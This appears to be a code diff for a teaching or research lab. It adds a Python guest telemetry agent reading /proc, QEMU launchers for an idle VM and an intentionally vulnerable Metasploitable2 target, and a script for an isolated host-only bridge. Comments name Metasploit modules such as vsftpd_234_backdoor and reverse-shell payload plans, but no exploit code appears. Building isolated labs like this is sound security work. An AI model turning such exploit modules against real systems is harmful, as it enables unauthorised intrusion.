+    """First line of /proc/stat: aggregate cpu user/nice/sys/idle/...
+    in jiffies since boot."""
+    text = _read("/proc/stat")
+    if text is None:
+        return None
+    line = text.splitlines()[0]
+    fields = line.split()
+    # cpu user nice system idle iowait irq softirq steal guest guest_nice
+    if not fields or fields[0] != "cpu":
+        return None
+    nums = [int(x) for x in fields[1:]]
+    pad = nums + [0] * max(0, 10 - len(nums))
+    return {
+        "user":      pad[0],
+        "nice":      pad[1],
+        "system":    pad[2],
+        "idle":      pad[3],
+        "iowait":    pad[4],
+        "irq":       pad[5],
+        "softirq":   pad[6],
+        "steal":     pad[7],
+        "guest":     pad[8],
+        "guest_nice":pad[9],
+    }
+
+
+def read_thermal_milli_c() -> int | None:
+    """Best-effort: /sys/class/thermal/thermal_zone0/temp."""
+    text = _read("/sys/class/thermal/thermal_zone0/temp")
+    if text is None:
+        return None
+    try:
+        return int(text.strip())
+    except ValueError:
+        return None
+
+
+def read_net_devs() -> dict[str, dict[str, int]]:
+    """Parse /proc/net/dev → {iface: {rx_bytes, tx_bytes, rx_pkts, tx_pkts}}."""
+    text = _read("/proc/net/dev")
+    out: dict[str, dict[str, int]] = {}
+    if text is None:
+        return out
+    lines = text.splitlines()
+    for line in lines[2:]:
+        if ":" not in line:
+            continue
+        name, _, rest = line.partition(":")
+        name = name.strip()
+        if name == "lo":
+            continue
+        cols = rest.split()
+        if len(cols) < 16:
+            continue
+        out[name] = {
+            "rx_bytes": int(cols[0]),
+            "rx_pkts":  int(cols[1]),
+            "tx_bytes": int(cols[8]),
+            "tx_pkts":  int(cols[9]),
+        }
+    return out
+
+
+def read_listen_ports() -> list[int]:
+    """TCP listen sockets from /proc/net/tcp + tcp6. State 0A = LISTEN."""
+    out: set[int] = set()
+    for path in ("/proc/net/tcp", "/proc/net/tcp6"):
+        text = _read(path)
+        if not text:
+            continue
+        for line in text.splitlines()[1:]:
+            cols = line.split()
+            if len(cols) < 4:
+                continue
+            if cols[3] != "0A":
+                continue
+            local = cols[1]  # "ADDR:PORT" with PORT in hex
+            _, _, port_hex = local.rpartition(":")
+            try:
+                out.add(int(port_hex, 16))
+            except ValueError:
+                pass
+    return sorted(out)
+
+
+def read_top_procs(top_n: int) -> list[dict[str, Any]]:
+    """Top-N processes by RSS. One pass over /proc, linear in process count."""
+    procs: list[dict[str, Any]] = []
+    try:
+        entries = os.listdir("/proc")
+    except OSError:
+        return procs
+    for ent in entries:
+        if not ent.isdigit():
+            continue
+        pid = int(ent)
+        stat = _read(f"/proc/{pid}/stat")
+        if stat is None:
+            continue
+        try:
+            rparen = stat.rindex(")")
+            comm = stat[stat.index("(") + 1 : rparen]
+            fields = stat[rparen + 2:].split()
+            utime = int(fields[11])
+            stime = int(fields[12])
+            rss_pages = int(fields[21])
+        except (ValueError, IndexError):
+            continue
+        procs.append({
+            "pid": pid,
+            "comm": comm[:32],
+            "cpu_jiffies": utime + stime,
+            "rss_bytes": rss_pages * os.sysconf("SC_PAGESIZE"),
+        })
+    procs.sort(key=lambda p: p["rss_bytes"], reverse=True)
+    return procs[:top_n]
+
+
+# ---------- one tick --------------------------------------------------------
+
+
+def collect_once(top_n: int = DEFAULT_TOP_N) -> dict[str, Any]:
+    mem = read_meminfo()
+    cpu = read_cpu_total()
+    load = read_loadavg()
+    return {
+        "t_guest_mono_ns": time.monotonic_ns(),
+        "t_guest_wall_ns": time.time_ns(),
+        "source": SOURCE,
+        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
+        "kernel": platform.release(),
+        "cpu_total_jiffies": cpu,
+        "load_1m_5m_15m": list(load) if load else None,
+        "mem_total_bytes":     (mem.get("MemTotal") or 0),
+        "mem_available_bytes": (mem.get("MemAvailable") or 0),
+        "mem_buffers_bytes":   (mem.get("Buffers") or 0),
+        "mem_cached_bytes":    (mem.get("Cached") or 0),
+        "swap_used_bytes":     (mem.get("SwapTotal", 0) - mem.get("SwapFree", 0)),
+        "thermal_milli_c": read_thermal_milli_c(),
+        "net": read_net_devs(),
+        "listen_ports": read_listen_ports(),
+        "top_procs": read_top_procs(top_n),
+    }
+
+
+# ---------- main loop -------------------------------------------------------
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-guest-agent")
+    p.add_argument("--port", default=DEFAULT_PORT,
+                   help="virtio-serial port path inside the guest")
+    p.add_argument("--interval-ms", type=int, default=DEFAULT_INTERVAL_MS)
+    p.add_argument("--top-n", type=int, default=DEFAULT_TOP_N)
+    p.add_argument("--once", action="store_true",
+                   help="emit a single row and exit (for smoke tests)")
+    args = p.parse_args(argv)
+
+    if args.once:
+        sys.stdout.write(json.dumps(collect_once(args.top_n)) + "\n")
+        sys.stdout.flush()
+        return 0
+
+    # Open the virtio-serial port. If the host hasn't wired one up,
+    # fall back to stdout so the agent is testable on bare-metal too.
+    out_fp: Any
+    if os.path.exists(args.port):
+        out_fp = open(args.port, "wb", buffering=0)
+    else:
+        sys.stderr.write(f"[cis490-agent] {args.port} missing; writing to stdout\n")
+        out_fp = sys.stdout.buffer
+
+    interval_ns = args.interval_ms * 1_000_000
+    next_tick = time.monotonic_ns()
+    try:
+        while True:
+            row = collect_once(args.top_n)
+            out_fp.write((json.dumps(row) + "\n").encode("utf-8"))
+            try:
+                out_fp.flush()
+            except (AttributeError, OSError):
+                pass
+            next_tick += interval_ns
+            sleep_ns = next_tick - time.monotonic_ns()
+            if sleep_ns > 0:
+                time.sleep(sleep_ns / 1_000_000_000)
+            else:
+                next_tick = time.monotonic_ns()
+    except KeyboardInterrupt:
+        return 0
+    except (BrokenPipeError, OSError) as e:
+        sys.stderr.write(f"[cis490-agent] write failed: {e}\n")
+        return 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())
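
Review note: the agent reports `cpu_total_jiffies` as cumulative counters since boot, so a consumer has to difference two consecutive rows to get utilization. A minimal sketch under that assumption follows. `cpu_busy_fraction` is a hypothetical helper, not part of the repo. It leaves out `guest` and `guest_nice` because the kernel already accounts for them inside `user` and `nice`.

```python
from __future__ import annotations

# Fields summed for the total; guest/guest_nice are already part of user/nice.
_COUNTED = ("user", "nice", "system", "idle", "iowait", "irq", "softirq", "steal")


def cpu_busy_fraction(prev: dict[str, int], cur: dict[str, int]) -> float | None:
    """Fraction of CPU time spent non-idle between two agent rows.

    Returns None when no jiffies elapsed (or counters went backwards,
    e.g. across a snapshot revert), since no ratio can be formed.
    """
    deltas = {k: cur[k] - prev[k] for k in _COUNTED}
    total = sum(deltas.values())
    if total <= 0:
        return None
    idle = deltas["idle"] + deltas["iowait"]
    return (total - idle) / total
```

At the default 100 ms tick only a handful of jiffies elapse per row on a typical 100 Hz kernel, so differencing rows a second or more apart gives a less quantized figure.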
--- a/vm/launch_demo.sh
+++ b/vm/launch_demo.sh
@ -16,7 +16,17 @@ set -euo pipefail
 REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
 IMAGE="${IMAGE:-$REPO_ROOT/vm/images/alpine-baseline.qcow2}"
 CIDATA="${CIDATA:-$REPO_ROOT/vm/images/cidata.iso}"
-RUN_DIR="${RUN_DIR:-/tmp/cis490-vm}"
+# SLOT lets the fleet runner spin up N concurrent VMs without socket /
+# port collisions. With SLOT unset, the ssh hostfwd port stays 2222 and
+# RUN_DIR defaults to /tmp/cis490-vm-0 (previously /tmp/cis490-vm).
+SLOT="${SLOT:-0}"
+RUN_DIR="${RUN_DIR:-/tmp/cis490-vm-$SLOT}"
+SSH_PORT="${SSH_PORT:-$((2222 + SLOT))}"
+# When BRIDGE is set, attach a tap to the host-only bridge instead of
+# using SLIRP usermode networking. The tap must already exist and be a
+# member of the bridge — see vm/setup_bridge.sh + (operator) ip tuntap.
+BRIDGE="${BRIDGE:-}"
+TAP="${TAP:-cis490tap$SLOT}"

 mkdir -p "$RUN_DIR"
 QMP_SOCK="$RUN_DIR/qmp.sock"
@ -32,8 +42,14 @@ if [[ ! -f "$CIDATA" ]]; then
    exit 1
 fi

+AGENT_SOCK="$RUN_DIR/agent.sock"
+
 # snapshot=on routes guest writes through a temporary overlay so the qcow2
 # on disk is never mutated — every boot starts from the same bytes.
+#
+# Second virtio-serial port (cis490.guest.agent) carries telemetry
+# from the in-guest agent. Surfaces inside the guest at
+# /dev/virtio-ports/cis490.guest.agent and on the host at $AGENT_SOCK.
 exec qemu-system-x86_64 \
    -name cis490-vm \
    -machine q35,accel=kvm \
@ -42,8 +58,15 @@ exec qemu-system-x86_64 \
    -m 256 \
    -drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
    -drive file="$CIDATA",format=raw,if=virtio,readonly=on \
-    -netdev user,id=n0,hostfwd=tcp:127.0.0.1:2222-:22 \
+    $(if [[ -n "$BRIDGE" ]]; then \
+        echo -n "-netdev tap,id=n0,ifname=$TAP,script=no,downscript=no "; \
+      else \
+        echo -n "-netdev user,id=n0,hostfwd=tcp:127.0.0.1:$SSH_PORT-:22 "; \
+      fi) \
    -device virtio-net-pci,netdev=n0 \
+    -device virtio-serial-pci,id=cis490vs0 \
+    -chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
+    -device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
    -nographic \
    -serial unix:"$RUN_DIR/serial.sock",server=on,wait=off \
    -monitor unix:"$MON_SOCK",server=on,wait=off \
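
A minimal sketch of the per-slot defaults that the launch_demo.sh hunk above derives when RUN_DIR, SSH_PORT and TAP are unset. The function name `slot_defaults` is hypothetical and not part of the repo; it only restates the arithmetic from the diff so the fleet-runner layout is easy to check by eye.

```shell
#!/usr/bin/env bash
# Hypothetical helper (not in the repo): prints the defaults that
# launch_demo.sh computes from SLOT when no overrides are exported.
slot_defaults() {
    local slot="${1:-0}"
    printf 'RUN_DIR=/tmp/cis490-vm-%s\n' "$slot"
    printf 'SSH_PORT=%s\n' "$((2222 + slot))"
    printf 'TAP=cis490tap%s\n' "$slot"
}

# Show the first three slots a fleet run might use.
for slot in 0 1 2; do
    slot_defaults "$slot"
done
```

Each slot gets its own run directory (and therefore its own qmp, monitor, serial and agent sockets), which is what keeps concurrent VMs from colliding.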
--- a/vm/launch_target.sh
+++ b/vm/launch_target.sh
@ -0,0 +1,117 @@
+#!/usr/bin/env bash
+# Boot the Tier-3 *target* VM (the intentionally-vulnerable guest the
+# exploit fires against). Companion to ``launch_demo.sh``, which boots
+# the *idle* Alpine guest used in Tiers 1-2.
+#
+# Networking note: this launcher uses SLIRP usermode networking with
+# ``restrict=on`` plus an explicit ``hostfwd`` for each vulnerable port.
+# That gives us:
+#   - the host can reach the guest's services (for msfrpcd + the
+#     exploit module to drive ``RHOSTS=127.0.0.1``)
+#   - the guest cannot reach the host or the internet (no NAT exit)
+#
+# The host-only ``br-malware`` bridge described in docs/architecture.md
+# replaces SLIRP once the bridge-side pcap collector (source 4) lands —
+# at which point payloads with ``reverse_tcp`` callbacks become viable
+# too. Until then, we restrict module choices to ones that return a
+# shell on the same socket they exploit (e.g. vsftpd_234_backdoor).
+#
+# Run-dir contract (read by run_tier3_demo.py):
+#   $RUN_DIR/qemu.pid
+#   $RUN_DIR/qmp.sock
+#   $RUN_DIR/monitor.sock
+#   $RUN_DIR/serial.sock
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
+IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}"
+SLOT="${SLOT:-0}"
+RUN_DIR="${RUN_DIR:-/tmp/cis490-target-$SLOT}"
+RAM_MIB="${RAM_MIB:-512}"
+# When BRIDGE is set, attach a tap to the host-only bridge instead of
+# using SLIRP. Pcap-feature episodes (source 4) require this.
+BRIDGE="${BRIDGE:-}"
+TAP="${TAP:-cis490target$SLOT}"
+# Ports the host should forward to the guest. Comma-separated host:guest pairs.
+# Default covers the vsftpd module's RPORT. Slot offset makes per-VM
+# fleet runs collision-free (slot 0 → 21, slot 1 → 121, slot 2 → 221, ...).
+PORT_BASE="${PORT_BASE:-$((21 + SLOT * 100))}"
+TARGET_PORTS="${TARGET_PORTS:-${PORT_BASE}:21}"
+# KVM if the host can take it; otherwise fall back to TCG. Cross-arch
+# images (Metasploitable2 is x86-only) on aarch64 hosts will need TCG.
+ACCEL="${ACCEL:-}"
+
+mkdir -p "$RUN_DIR"
+QMP_SOCK="$RUN_DIR/qmp.sock"
+MON_SOCK="$RUN_DIR/monitor.sock"
+PID_FILE="$RUN_DIR/qemu.pid"
+SERIAL_SOCK="$RUN_DIR/serial.sock"
+
+if [[ ! -f "$IMAGE" ]]; then
+    cat >&2 <<EOF
+no target image at $IMAGE
+
+Drop a vulnerable Linux qcow2 there. The canonical choice is
+Metasploitable2 — see docs/sources.md for the download + sha256.
+
+If the image is x86 and your host is not, set ACCEL=tcg explicitly.
+EOF
+    exit 1
+fi
+
+# Build the netdev string. With BRIDGE set we use a tap on the host-only
+# bridge (so source-4 pcap captures the traffic). Without it, SLIRP
+# usermode + restrict=on for the no-egress smoke runs.
+if [[ -n "$BRIDGE" ]]; then
+    NETDEV="tap,id=n0,ifname=$TAP,script=no,downscript=no"
+else
+    NETDEV="user,id=n0,restrict=on"
+    IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
+    for pair in "${_PAIRS[@]}"; do
+        host_port="${pair%%:*}"
+        guest_port="${pair##*:}"
+        NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
+    done
+fi
+
+# Pick acceleration: explicit override wins; otherwise use KVM if the
+# device is present, else TCG.
+if [[ -z "$ACCEL" ]]; then
+    if [[ -e /dev/kvm && -r /dev/kvm && -w /dev/kvm ]]; then
+        ACCEL="kvm"
+    else
+        ACCEL="tcg"
+    fi
+fi
+
+CPU_FLAGS=()
+if [[ "$ACCEL" == "kvm" ]]; then
+    CPU_FLAGS=(-cpu host)
+fi
+
+AGENT_SOCK="$RUN_DIR/agent.sock"
+
+# snapshot=on so the qcow2 is never mutated — every boot is identical.
+# Second virtio-serial port carries the in-guest agent's telemetry to
+# the host (see vm/guest-agent/). Targets without the agent installed
+# (e.g. unmodified Metasploitable2) leave the device unused — the
+# host-side collector simply gets no rows. Harmless.
+exec qemu-system-x86_64 \
+    -name cis490-target \
+    -machine q35,accel="$ACCEL" \
+    "${CPU_FLAGS[@]}" \
+    -smp 1,sockets=1,cores=1,threads=1 \
+    -m "$RAM_MIB" \
+    -drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
+    -netdev "$NETDEV" \
+    -device virtio-net-pci,netdev=n0 \
+    -device virtio-serial-pci,id=cis490vs0 \
+    -chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
+    -device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
+    -nographic \
+    -serial unix:"$SERIAL_SOCK",server=on,wait=off \
+    -monitor unix:"$MON_SOCK",server=on,wait=off \
+    -qmp unix:"$QMP_SOCK",server=on,wait=off \
+    -pidfile "$PID_FILE" \
+    -display none
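
The SLIRP branch of launch_target.sh above turns TARGET_PORTS into a `-netdev` argument. The sketch below isolates that step in a function so it can be exercised without booting QEMU. The name `build_slirp_netdev` is an assumption made for illustration; the string-building logic follows the diff.

```shell
#!/usr/bin/env bash
# Hypothetical wrapper (not in the repo) around the loop from
# launch_target.sh: expands comma-separated host:guest pairs into
# one hostfwd clause per pair on a restricted SLIRP netdev.
build_slirp_netdev() {
    local ports="$1" netdev="user,id=n0,restrict=on" pair
    local -a pairs
    IFS=',' read -ra pairs <<< "$ports"
    for pair in "${pairs[@]}"; do
        # ${pair%%:*} is the host port, ${pair##*:} is the guest port.
        netdev+=",hostfwd=tcp:127.0.0.1:${pair%%:*}-:${pair##*:}"
    done
    printf '%s\n' "$netdev"
}

build_slirp_netdev "2121:21,2222:22"
```

With the launcher's defaults, slot 0 forwards host port 21. On a typical Linux host, binding a port below 1024 needs extra privilege, so an unprivileged run may want to export a higher TARGET_PORTS such as the `2121:21` used here.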
--- a/vm/setup_bridge.sh
+++ b/vm/setup_bridge.sh
@ -0,0 +1,56 @@
+#!/usr/bin/env bash
+# Create the host-only ``br-malware`` bridge for Tier-3+ episodes.
+#
+# Properties (from docs/architecture.md):
+#   - Bridge address 10.200.0.1/24 on the host side.
+#   - NO NAT, NO route, NO DNS: guests cannot reach the internet or
+#     any network beyond this bridge. The bridge only carries traffic
+#     between the host (at the bridge address) and the guests on it.
+#   - Lab-host and target VMs both attach via tap devices; the
+#     launchers use script=no, so the tap must already be a bridge member.
+#
+# Run as root, ONCE per host. Idempotent — re-running is safe.
+
+set -euo pipefail
+
+BRIDGE="${BRIDGE:-br-malware}"
+BRIDGE_IP="${BRIDGE_IP:-10.200.0.1/24}"
+
+log() { printf '[setup_bridge] %s\n' "$*" >&2; }
+
+[[ $EUID -eq 0 ]] || { log "must run as root"; exit 1; }
+
+if ! command -v ip >/dev/null; then
+    log "iproute2 ('ip') is required"
+    exit 1
+fi
+
+if ! ip link show "$BRIDGE" >/dev/null 2>&1; then
+    log "creating bridge $BRIDGE"
+    ip link add name "$BRIDGE" type bridge
+    # Disable spanning-tree on the host-only bridge — it isn't needed
+    # and adds startup delay.
+    ip link set "$BRIDGE" type bridge stp_state 0
+fi
+
+ip link set "$BRIDGE" up
+
+# Add the host-side address if not already there.
+if ! ip -4 addr show dev "$BRIDGE" | grep -qwF "${BRIDGE_IP%%/*}"; then
+    log "adding $BRIDGE_IP to $BRIDGE"
+    ip addr add "$BRIDGE_IP" dev "$BRIDGE"
+fi
+
+# Warn if IP forwarding is enabled. This script does not change the
+# setting; with net.ipv4.ip_forward=1 and no firewall rule, traffic on
+# the malware bridge could be routed to the LAN.
+if [[ "$(cat /proc/sys/net/ipv4/ip_forward)" == "1" ]]; then
+    log "WARNING: net.ipv4.ip_forward=1 — make sure iptmonads / nftables"
+    log "blocks traffic from $BRIDGE to non-loopback devices."
+fi
+
+log "bridge ready: $(ip -4 -br addr show "$BRIDGE")"
+log ""
+log "Launchers can now opt into tap+bridge mode by setting:"
+log "  BRIDGE=$BRIDGE   (tells launch_target.sh to attach a tap to this bridge)"
+log "Default launcher behaviour stays SLIRP usermode for simplicity."
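
Both launchers pass `script=no,downscript=no`, so QEMU does not attach the tap to the bridge itself, and setup_bridge.sh does not create taps. The sketch below prints one plausible set of operator commands for that step. The function name `tap_commands` and the default owner are assumptions; the helper only prints and never changes the host.

```shell
#!/usr/bin/env bash
# Hypothetical dry-run helper (not in the repo): prints the iproute2
# commands an operator could run as root to create a tap and make it
# a member of the host-only bridge. It does not execute them.
tap_commands() {
    local tap="$1" bridge="${2:-br-malware}" owner="${3:-root}"
    printf 'ip tuntap add dev %s mode tap user %s\n' "$tap" "$owner"
    printf 'ip link set dev %s master %s\n' "$tap" "$bridge"
    printf 'ip link set dev %s up\n' "$tap"
}

# Tap names follow the launchers' defaults: cis490tap$SLOT for the
# demo guest and cis490target$SLOT for the target guest.
tap_commands cis490tap0
tap_commands cis490target0
```

Printing rather than executing keeps the sketch safe to run anywhere; piping the output to a root shell is left to the operator once the names have been checked.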